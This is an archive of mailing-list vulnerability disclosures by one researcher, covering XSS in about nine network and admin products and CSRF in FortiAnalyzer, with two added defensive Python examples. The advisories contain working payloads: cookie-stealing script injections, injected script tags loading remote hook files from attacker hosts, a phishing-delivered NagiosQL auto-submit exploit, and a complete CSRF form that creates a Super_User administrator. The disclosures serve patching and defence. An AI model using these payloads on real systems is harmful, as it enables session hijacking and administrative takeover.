[Full-disclosure] Reflected XSS Attacks XSS vulnerabilities in Webmin 1.670 (CVE-2014-0339)

2014-03-15 Thread William Costa
I. VULNERABILITY

-

Reflected XSS Attacks XSS vulnerabilities in Webmin 1.670

II. BACKGROUND

-

Webmin is a web-based interface for system administration for Unix.
Using any modern web browser, you can set up user accounts, Apache,
DNS, file sharing and much more. Webmin removes the need to manually
edit Unix configuration files like /etc/passwd, and lets you manage a
system from the console or remotely. See the standard modules page for
a list of all the functions built into Webmin, or check out the
screenshots.

III. DESCRIPTION

-

A reflected XSS vulnerability has been detected in Webmin 1.670 in the log
page, which allows arbitrary HTML/script code to be executed in the
context of the victim user's browser.
The code injection is done through the parameter search in the page
https://IP:1/webminlog/view.cgi?id=1&search=



IV. PROOF OF CONCEPT

-

https://192.168.49.132:1/webminlog/view.cgi?id=1search=e;scriptalert(document.cookie);/script



V. BUSINESS IMPACT

-

An attacker can execute arbitrary HTML or script code in a targeted user's
browser; this can be leveraged to steal sensitive information such as
user credentials, personal data, etc.





VI. SYSTEMS AFFECTED

-



Webmin version 1.670 installed on Debian





VII. SOLUTION

-

All data received by the application that can be modified by the user must
be validated before any kind of transaction is made with it.

VIII. References
-
http://www.kb.cert.org/vuls/id/381692
http://www.webmin.com/changes.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WatchGuard Fireware XTM devices contain a cross-site scripting vulnerability (CVE-2014-0338)

2014-03-13 Thread William Costa
I. VULNERABILITY

-

Reflected XSS Attacks vulnerabilities in WatchGuard XTM 11.8




II. BACKGROUND

-

WatchGuard builds affordable, all-in-one network and content security
solutions to provide defense in depth for corporate content, networks and
the businesses they power.

III. DESCRIPTION

-

A reflected XSS vulnerability has been detected in WatchGuard XTM.

The code injection is done through the parameter pol_name in the
page /firewall/policy?pol_name=(HERE XSS)



IV. PROOF OF CONCEPT

-

The application does not validate the parameter pol_name correctly.

https://10.200.210.100:8080/firewall/policy?pol_name=qqq;body
onload=alert(document.cookie)service=Anyis_new=1



V. BUSINESS IMPACT

-

An attacker can execute arbitrary HTML or script code in a targeted user's
browser, which allows arbitrary HTML/script code to be executed in the
context of the victim user's browser, allowing cookie theft/session
hijacking and thus enabling full access to the box.



VI. SYSTEMS AFFECTED

-

Tested WatchGuard XTM Version: 11.8 (Build 432340)





VII. SOLUTION
-

All data received by the application that can be modified by the user must
be validated before any kind of transaction is made with it.


VIII. References
-
http://www.kb.cert.org/vuls/id/807134
http://watchguardsecuritycenter.com/2014/03/13/fireware-xtm-11-8-3-update-corrects-xss-flaw/


By William Costa

william.co...@gmail.com

[Full-disclosure] Multiple XSS in Proxmox Mail Gateway 3.1 (CVE-2014-2325)

2014-03-12 Thread William Costa
I. VULNERABILITY

-

Multiple XSS in Proxmox Mail Gateway 3.1



II. BACKGROUND

-

Proxmox Mail Gateway helps you protect your business against all email
threats like spam, viruses, phishing and trojans at the moment they
emerge. The flexible architecture combined with the user-friendly,



III. DESCRIPTION

-

A reflected XSS via GET and a stored XSS via POST have been detected in
Proxmox Mail Gateway, in the parameter state of
/objects/who/index.htm?state= and in the input User (E-mail address) in
/quarantine/spam/manage.htm, which allow arbitrary HTML/script code to be
executed in the context of the victim user's browser and/or a session
hijacking attack.





IV. PROOF OF CONCEPT

-

 The application does not validate the parameter filter in
https://IP/objects/who/index.htm?itemid=1gid=2state=
'ascriptalert(document.cookie)/script







V. BUSINESS IMPACT

-



That allows attackers to hijack the authentication of administrators.



VI. REQUIREMENTS

---

An Attacker needs to know the IP of the device.

An Administrator needs an authenticated connection to the device.



VII. SYSTEMS AFFECTED

-

Try Proxmox Mail Gateway 3.1



VIII. SOLUTION

-

All parameters must be validated.

Fix
http://proxmox.com/news/archive/view/listid-1-proxmox-newsletter/mailid-48-proxmox-newsletter-march-2014-proxmox-ve-3-2-released/tmpl-component

By William Costa

[Full-disclosure] XSS in url for access of Confirmation Required in box for antispam from company AKER (CVE-2013-6037)

2014-03-06 Thread William Costa
I. VULNERABILITY
-
Reflected XSS vulnerabilities in AKER SECURE MAIL GATEWAY = v2.5.2

II. BACKGROUND
-
The Aker Secure Mail Gateway is a complete e-mail security platform

III. DESCRIPTION
-
A reflected XSS vulnerability has been detected in Aker Secure Mail Gateway
=2.5.2, which allows arbitrary HTML/script code to be executed in the
context of the victim user's browser.
The code injection is done through the parameters msg_id and content in
the page index.php.


IV. PROOF OF CONCEPT
-
The application does not validate the double encoding of the msg_id
parameter correctly. Malicious Request (msg_id)
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f09/scriptalert(String(/XSS/).substr(1,6)
); /script
Vulnerable:
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f09/script
src=http://10.0.1.142:5005/xook.js/script
Vulnerable:
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f09/iframe
src=http://www.google.com /iframe


V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser; this can be leveraged to steal sensitive information such as
user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Aker Secure Mail Gateway = v2.5.2

VII. SOLUTION
-
http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp

References

http://www.kb.cert.org/vuls/id/687278
http://www.aker.com.br/
http://www.aker.com.br/produtos/aker-secure-mail-gateway
http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All

By William Costa

[Full-disclosure] Reflected XSS Attacks vulnerabilities in DELL SonicWALL Universal Management Suite v7.1 (CVE-2014-0332)

2014-02-12 Thread William Costa
 I. VULNERABILITY

-

Reflected XSS Attacks vulnerabilities in DELL SonicWALL Universal
Management Suite v7.1



II. BACKGROUND

-

Dell(R) SonicWALL(R) provides intelligent network security and data
protection solutions that enable customers and partners to dynamically
secure, control, and scale their global networks.



III. DESCRIPTION

-

A reflected XSS vulnerability has been detected in DELL SonicWALL
Universal Management Suite.

The code injection is done through the parameter node_id in the page
/sgms/mainPage?page=genNetwork&screenid=1002&manager=ScreenDisplayManager&level=1&node_id



IV. PROOF OF CONCEPT

-

The application does not validate the parameter node_id correctly.



https://ip_gms/sgms/mainPage?page=genNetworkscreenid=1002manager=ScreenDisplayManagerlevel=1node_id=a;scriptalert(document.cookie);/scriptscreenid=1002unused=help_url=node_name=Instance
ViewunitType=1searchBySonicwall=0




V. BUSINESS IMPACT

-

An attacker can execute arbitrary HTML or script code in a targeted user's
browser, which allows arbitrary HTML/script code to be executed in the
context of the victim user's browser, allowing cookie theft/session
hijacking and thus enabling full access to the box.

VI. SYSTEMS AFFECTED

-

Tested on DELL SonicWALL Universal Management Suite v7.1 (online demo)





VII. SOLUTION

-

All data received by the application that can be modified by the user must
be validated before any kind of transaction is made with it.



VIII. REFERENCES
-
http://www.kb.cert.org/vuls/id/727318
http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf


By William Costa

william.co...@gmail.com

[Full-disclosure] Reflected XSS Attacks vulnerabilities in Symantec WEB Gateway 5.1.1.24 (CVE-2013-5013)

2014-02-10 Thread William Costa
I. VULNERABILITY

-

Reflected XSS Attacks vulnerabilities in Symantec WEB Gateway 5.1.1.24




II. BACKGROUND

-

Symantec Corporation is an American computer security, backup and
availability solutions software corporation headquartered in Mountain
View, California, United States. It is a Fortune 500 company and a
member of the S&P 500 stock market index.



III. DESCRIPTION

-

A reflected XSS vulnerability has been detected in Symantec Web Gateway.

The code injection is done through the parameter operand[] in the
page /spywall/blacklist.php?variable[]=&operator[]=&operand[]=



IV. PROOF OF CONCEPT

-

The application does not validate the parameter operand[] correctly.



https://10.200.210.144/spywall/blacklist.php?variable[]=operator[]=operand[]='scriptalert(document.cookie);/script



V. BUSINESS IMPACT

-

An attacker can execute arbitrary HTML or script code in a targeted user's
browser, which allows arbitrary HTML/script code to be executed in the
context of the victim user's browser, allowing cookie theft/session
hijacking and thus enabling full access to the box.

VI. SYSTEMS AFFECTED

-

Tested Symantec Web Gateway Version: 5.1.1.24





VII. SOLUTION

-

All data received by the application that can be modified by the user must
be validated before any kind of transaction is made with it.

http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140210_00

By William Costa

william.co...@gmail.com

[Full-disclosure] XSS Reflected vulnerabilities in OS of FortiWeb v 5.0.3 (CVE-2013-7181)

2014-02-04 Thread William Costa
I. VULNERABILITY

-

XSS Reflected vulnerabilities in OS of FortiWeb v 5.0.3

CVE-2013-7181 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7181


II. BACKGROUND

-

Fortinet's industry-leading, Network Security Platforms deliver Next
Generation Firewall (NGFW) security with exceptional throughput, ultra
low latency, and multi-vector threat protection.



III. DESCRIPTION

-

A reflected XSS vulnerability has been detected in FortiWeb 5.0.3 in the
parameter filter of /user/ldap_user/add, which allows arbitrary
HTML/script code to be executed in the context of the victim user's
browser and/or a session hijacking attack.





IV. PROOF OF CONCEPT

-

The application does not validate the parameter filter in /user/ldap_user/add.




V. BUSINESS IMPACT

-



That allows attackers to hijack the authentication of administrators.



VI. REQUIREMENTS

---

An Attacker needs to know the IP of the device.

An Administrator needs an authenticated connection to the device.



VII. SYSTEMS AFFECTED

-

Try FortiWEB VM or appliance v5.0.3





VIII. SOLUTION

-

Upgrade to FortiWeb 5.1.0 or higher.


By William Costa

[Full-disclosure] Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability ( CVE-2013-7182)

2014-02-04 Thread William Costa
I. VULNERABILITY

-

Reflected XSS Attacks vulnerabilities in FortiOS 5.0.5



II. BACKGROUND

-

Fortinet's industry-leading, Network Security Platforms deliver Next
Generation Firewall (NGFW) security with exceptional throughput, ultra
low latency, and multi-vector threat protection.



III. DESCRIPTION

-

A reflected XSS vulnerability has been detected in FortiOS 5.0.5.

The code injection is done through the parameter mkey in the page
/firewall/schedule/recurrdlg



IV. PROOF OF CONCEPT

-

The application does not validate the parameter mkey correctly.



http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a;SCRIPT
SRC=http://10.0.1.120/xss/good.js;/SCRIPT

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, which allows arbitrary HTML/script code to be executed in the
context of the victim user's browser, allowing theft of the CSRF token
and thus enabling the creation of an administrator user on the box for
full access.





VI. SYSTEMS AFFECTED
-
Try FortiOS v5.0.5 VM and Appliance



VII. SOLUTION

-

Upgrade to FortiOS 5.0.6 or higher.

References

http://www.fortiguard.com/advisory/FG-IR-14-003/
http://www.kb.cert.org/vuls/id/728638



By William Costa

[Full-disclosure] Contact PSIRT Fortinet

2014-01-24 Thread William Costa
Does anyone have a contact person in the PSIRT at Fortinet?
The PSIRT email at Fortinet has not responded.

[Full-disclosure] Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2 (CVE: CVE-2013-6039)

2013-12-05 Thread William Costa
I. VULNERABILITY
-
Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2

II. BACKGROUND
-
NagiosQL is a web based administration tool designed for Nagios, but might also 
work with forks. It helps you to easily build a complex configuration with all 
options, manage and use them. NagiosQL is based on a webserver with PHP, MySQL 
and local file or remote access to the Nagios configuration files.

III. DESCRIPTION
-
A reflected XSS vulnerability has been detected in NagiosQL in all pages
that contain a search input, which allows arbitrary HTML/script code to be
executed in the context of the victim user's browser.

The code injection is done through the parameter txtSearch in all pages.

IV. PROOF OF CONCEPT
-
The application does not validate the parameter “txtSearch” correctly.

Malicious Request (txtSearch)
Vulnerable:
POST /nagiosql/admin/hostdependencies.php HTTP/1.1
Host: 10.0.1.120
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.120/nagiosql/admin/hostdependencies.php
Cookie: PHPSESSID=hhr9lv77k9d4vvh0cauco48206
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 198

txtSearch=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&modus=checkform&hidModify=&hidListId=&hidLimit=0&hidSortBy=1&hidSortDir=ASC&hidSort=0&selModify=none&selTargetDomain=1

HTTP/1.1 200 OK
Date: Wed, 30 Oct 2013 16:15:34 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3440
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser; this can be leveraged to steal sensitive information such as
user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
NagiosQL, tested only on 3.2.0 Servicepack 2

VII. SOLUTION
-
All data received by the application that can be modified by the user must
be validated before any kind of transaction is made with it.

After clicking search.
VIII. REMOTE EXPLOIT
-
There are two pages: one that the user accesses and another that contains
the code to send the XSS via POST.

Send a phishing email to the administrator pointing to a page with the
following code. Name: page.html

<html>
<body>
<H1>BLAH BLAH BLAH</H1>
<p>Your bases are not belong to me, dun worry bro</p>
<? if (isset($_GET[done])) {
die();
}?><iframe src="http://yoursite.com/xss/index.php" width=1 height=1
frameborder=0></iframe>
</body>
</html>

Name: index.php
<html>
<head>
<style>
.xss {display: none;
}
</style>
</head>
<body onload="XSS.submit();">
<form id="xss" action="http://sitevictim/nagiosql/admin/hosts.php"
method="post" name="XSS">
<input name="txtSearch"
value="<script>alert(document.cookie);</script>"></input>

</form>
</body>
</html>

BY
F3nr1r (William Costa)
william.co...@gmail.com

REFERENCES

http://cwe.mitre.org/data/definitions/79.html
http://www.nagiosql.org/
http://www.nagiosql.org/forum8/solved-issues/3270-security-hotfix-for-%20nagiosql-3-2-sp2.html#3690

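The reflected-XSS findings on this page (Webmin, WatchGuard, Proxmox, Aker, SonicWALL, Symantec, FortiWeb, FortiOS and NagiosQL) share one root cause: a request parameter echoed into HTML without output encoding. The following added example is not code from any of these vendors or from the advisory author; it decodes the NagiosQL POST body shown above, renders the term the unsafe way and the hardened way, and checks which one lets the value escape the attribute. The template fragment and all function names are this example's own assumptions.

```python
"""Reflected parameter: unsafe vs. hardened rendering (added example, not NagiosQL code)."""
import html
from urllib.parse import parse_qs

# Constructed copy of the advisory's POST body (line wraps removed, '&' separators restored).
NAGIOSQL_BODY = (
    "txtSearch=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
    "&modus=checkform&hidModify=&hidListId=&hidLimit=0&hidSortBy=1"
    "&hidSortDir=ASC&hidSort=0&selModify=none&selTargetDomain=1"
)

# Hypothetical fragment of the search form that echoes the submitted term back.
TEMPLATE = '<input type="text" name="txtSearch" value="{value}">'

# Characters that change meaning inside HTML text or a quoted attribute.
HTML_META = set('<>"\'&')


def search_term(body: str) -> str:
    """Decode txtSearch the way the PHP side sees it in $_POST."""
    return parse_qs(body, keep_blank_values=True).get("txtSearch", [""])[0]


def render_unsafe(term: str) -> str:
    """Vulnerable pattern: the raw parameter is spliced into the attribute."""
    return TEMPLATE.format(value=term)


def render_hardened(term: str) -> str:
    """Fix: encode for the attribute context (quotes included), then splice."""
    return TEMPLATE.format(value=html.escape(term, quote=True))


def attribute_breakout(page: str) -> bool:
    """True when the reflected value closed the attribute and opened a new tag."""
    return '"/><script' in page or '"><script' in page


def suspicious_chars(term: str) -> set:
    """Metacharacters worth logging when they appear in a search parameter."""
    return HTML_META & set(term)


if __name__ == "__main__":
    term = search_term(NAGIOSQL_BODY)
    print("decoded:", term)
    print("unsafe: ", render_unsafe(term))
    print("fixed:  ", render_hardened(term))
    print("flag:   ", sorted(suspicious_chars(term)))
```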

[Full-disclosure] CSRF vulnerabilities in OS of fortianalyzer 5.0.4

2013-11-12 Thread William Costa
CERT(R) did not respond to my email, and Fortinet has not given the credits.




I. VULNERABILITY

-

CSRF vulnerabilities in OS of fortianalyzer 5.0.4



II. BACKGROUND

-

Fortinet’s industry-leading, Network Security Platforms deliver Next
Generation Firewall (NGFW) security with exceptional throughput, ultra
low latency, and multi-vector threat protection.



III. DESCRIPTION

-

A CSRF vulnerability has been detected in FortiAnalyzer 5.0.4 in
/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog, which allows
attackers to hijack the authentication of administrators for requests
that modify settings or create an administrator user in FortiAnalyzer,
because these functions are not protected by CSRF tokens.



IV. PROOF OF CONCEPT

-

The application does not validate the parameter “csrf_token” in
/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog.



<html>

<body onload="CSRF.submit();">

<form id="csrf"
action="https://IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog"
method="post" name="CSRF">

<input name="userId" value="user.via.cfsr"></input>
<input name="type" value="0"></input>
<input name="rserver" value=""></input>
<input name="lserver" value=""></input>
<input name="subject" value=""></input>
<input name="cacerts" value="Fortinet_CA2"></input>
<input name="password" value="123456"></input>
<input name="password_updated" value="1"></input>
<input name="confirm_pwd" value="123456"></input>
<input name="confirm_pwd_updated" value="1"></input>
<input name="host_1" value="0.0.0.0/0.0.0.0"></input>
<input name="host_2" value="255.255.255.255/255.255.255.255"></input>
<input name="host_3" value="255.255.255.255/255.255.255.255"></input>
<input name="host_4" value="255.255.255.255/255.255.255.255"></input>
<input name="host_5" value="255.255.255.255/255.255.255.255"></input>
<input name="host_6" value="255.255.255.255/255.255.255.255"></input>
<input name="host_7" value="255.255.255.255/255.255.255.255"></input>
<input name="host_8" value="255.255.255.255/255.255.255.255"></input>
<input name="host_9" value="255.255.255.255/255.255.255.255"></input>
<input name="host_10" value="255.255.255.255/255.255.255.255"></input>
<input name="host6_1" value=":::::::/128"></input>
<input name="host6_2" value=":::::::/128"></input>
<input name="host6_3" value=":::::::/128"></input>
<input name="host6_4" value=":::::::/128"></input>
<input name="host6_5" value=":::::::/128"></input>
<input name="host6_6" value=":::::::/128"></input>
<input name="host6_7" value=":::::::/128"></input>
<input name="host6_8" value=":::::::/128"></input>
<input name="host6_9" value=":::::::/128"></input>
<input name="host6_10" value=":::::::/128"></input>
<input name="profile" value="Super_User"></input>
<input name="alladomRDGrp" value="0"></input>
<input name="_adom" value=""></input>
<input name="allpackRDGrp" value="0"></input>
<input name="_adom" value=""></input>
<input name="allpackRDGrp" value="0"></input>
<input name="_pack" value=""></input>
<input name="desc" value=""></input>
<input name="showForce" value="0"></input>
<input name="numhosts" value="0"></input>
<input name="numhosts6" value="3"></input>
<input name="_comp_8" value="OK"></input>
<input name="actionevent" value="new"></input>
<input name="profileId" value=""></input>
<input name="mgt" value=""></input>
<input name="dashboard" value=""></input>
<input name="dashboardmodal" value=""></input>
<input name="csrf_token" value=""></input>

</form>

</body>

</html>



V. BUSINESS IMPACT

-



That allows attackers to hijack the authentication of administrators for
requests that modify settings or create an administrator user in
FortiAnalyzer, and to have access to all functions of the box.



VI. REQUIREMENTS

---

An Attacker needs to know the IP of the device.

An Administrator needs an authenticated connection to the device.



VII. SYSTEMS AFFECTED

-

Try Fortianalyzer VM or appliance v5.0.4







VIII. SOLUTION

-

Upgrade to v5.0.5



POC

https://vimeo.com/78776768

By William Costa

william.co...@gmail.com
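The FortiAnalyzer form above works because the 5.0.4 endpoint accepted an empty csrf_token from a cross-site auto-submitted form. The following added example (not Fortinet's code) models the server-side check such a state-changing handler needs: a per-session token compared in constant time, plus an Origin check; it feeds in the advisory's form with csrf_token empty and shows it rejected, while a same-session submission carrying the token is accepted. The Session class, the attacker origin and the handler name are this example's assumptions; the field names come from the advisory.

```python
"""CSRF token validation for an admin-user form (added example, not Fortinet code)."""
import hmac
import secrets
from typing import Dict, List, Optional, Tuple

# Constructed, trimmed copy of the advisory's form fields (host lists omitted).
POC_FORM = {
    "userId": "user.via.cfsr",
    "profile": "Super_User",
    "password": "123456",
    "actionevent": "new",
    "csrf_token": "",          # the PoC submits an empty token
}

SITE = "https://IP_Fortianalyzer"          # placeholder from the advisory
ATTACKER_ORIGIN = "https://attacker.example"  # constructed, hypothetical


class Session:
    """Hypothetical server-side session; the CSRF token is bound to it."""

    def __init__(self) -> None:
        self.user = "admin"
        self.csrf_token = secrets.token_urlsafe(32)
        self.created_users: List[Tuple[str, str]] = []


def admin_user_dialog(session: Session, form: Dict[str, str],
                      origin: Optional[str], site: str = SITE) -> str:
    """Return 'created' or a rejection reason for a user-creation request."""
    # 1. A browser-submitted cross-site form carries the attacker's Origin.
    if origin is not None and origin != site:
        return "rejected: cross-origin request"
    # 2. The token must be present; an empty csrf_token is what 5.0.4 let through.
    token = form.get("csrf_token", "")
    if not token:
        return "rejected: missing csrf_token"
    # 3. Constant-time comparison against the token issued to this session.
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return "rejected: csrf_token mismatch"
    if form.get("actionevent") == "new":
        session.created_users.append((form.get("userId", ""), form.get("profile", "")))
    return "created"


def replay_poc(session: Session) -> str:
    """The advisory's form as a browser would auto-submit it from the attacker's page."""
    return admin_user_dialog(session, POC_FORM, origin=ATTACKER_ORIGIN)


def legitimate_submit(session: Session) -> str:
    """The same form rendered by the real UI, carrying the session's token."""
    form = dict(POC_FORM, csrf_token=session.csrf_token)
    return admin_user_dialog(session, form, origin=SITE)


if __name__ == "__main__":
    s = Session()
    print("PoC replay:      ", replay_poc(s))
    print("no Origin header:", admin_user_dialog(s, POC_FORM, origin=None))
    print("legitimate:      ", legitimate_submit(s), s.created_users)
```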